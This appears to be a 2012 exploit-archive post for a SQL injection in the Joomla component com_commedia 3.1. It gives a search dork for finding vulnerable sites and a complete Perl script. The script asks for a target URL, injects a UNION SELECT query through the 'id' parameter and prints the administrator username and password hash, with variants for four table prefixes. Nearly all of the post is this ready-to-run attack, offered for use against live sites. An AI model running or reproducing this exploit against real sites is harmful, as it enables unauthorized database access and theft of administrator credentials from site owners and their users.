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Joomla Commedia 3.1 SQL Injection

Posted on 20 October 2012

Exploit Title: Joomla commedia Remote Exploit dork: inurl:index.php?option=com_commedia Date: [18-10-2012] Author: Daniel Barragan "D4NB4R" Twitter: @D4NB4R Vendor: http://www.ecolora.org/ Version: 3.1 (last update on Oct 7, 2012) and lowers License: Commercial and Non-Commercial, affects 2 versions Demo: http://www.ecolora.org/index.php/demo/commedia Download: http://ecolora.com/index.php/programmy/file/5-plagin-mp3browser-dlya-muzykalnykh-satov-na-joomla-15 Tested on: [Linux(bt5)-Windows(7ultimate)] Especial greetz: Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt Descripcion: Commedia - a component and content plugin that allows you to create a content table containing all of the MP3's that are present in any directory of your site, a FTP-server (folder, single path to ftp-file) or a HTTP(S)-server (DROPBOX, folder, single path to http-file or http-radio). Exploit: #!/usr/bin/perl -w ######################################## # Joomla Component (commedia) Remote SQL Exploit #----------------------------------------------------------------------------# ######################################## print " "; print " "; print " Daniel Barragan D4NB4R "; print " "; print " Joomla com_commedia Remote Sql Exploit "; print " "; print " :::Opciones de prefijo tabla users::: "; print " 1. jos_users 2. jml_users 3. muc_users 4. sgj_users "; use LWP::UserAgent; use HTTP::Request; use LWP::Simple; print ":::Opcion::: "; my $option=<STDIN>; if ($option==1){&jos_users} if ($option==2){&jml_users} if ($option==3){&muc_users} if ($option==4){&sgj_users} sub jos_users { print " Ingrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="jos_users"; $d4n="com_commedia&format"; $parametro="down&pid=59&id"; $b = LWP::UserAgent->new() or die "Could not initialize browser "; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print " Los Datos Extraidos son: "; print " * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){print " * Admin Hash : $1 "; print " # El Exploit aporto usuario y password # ";} else{print " [-] Exploit Failed, Intente manualmente... ";} } sub jml_users { print " Ingrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="jml_users"; $d4n="com_commedia&format"; $parametro="down&pid=59&id"; $b = LWP::UserAgent->new() or die "Could not initialize browser "; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print " Los Datos Extraidos son: "; print " * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){print " * Admin Hash : $1 "; print " # El Exploit aporto usuario y password # ";} else{print " [-] Exploit Failed, Intente manualmente... ";} } sub muc_users { print " Ingrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="muc_users"; $d4n="com_commedia&format"; $parametro="down&pid=59&id"; $b = LWP::UserAgent->new() or die "Could not initialize browser "; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print " Los Datos Extraidos son: "; print " * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){print " * Admin Hash : $1 "; print " # El Exploit aporto usuario y password # ";} else{print " [-] Exploit Failed, Intente manualmente... ";} } sub sgj_users { print " Ingrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="sgj_users"; $d4n="com_commedia&format"; $parametro="down&pid=59&id"; $b = LWP::UserAgent->new() or die "Could not initialize browser "; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print " Los Datos Extraidos son: "; print " * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){print " * Admin Hash : $1 "; print " # El Exploit aporto usuario y password # ";} else{print " [-] Exploit Failed, Intente manualmente... ";} } _____________________________________________________ Daniel Barragan "D4NB4R" 2012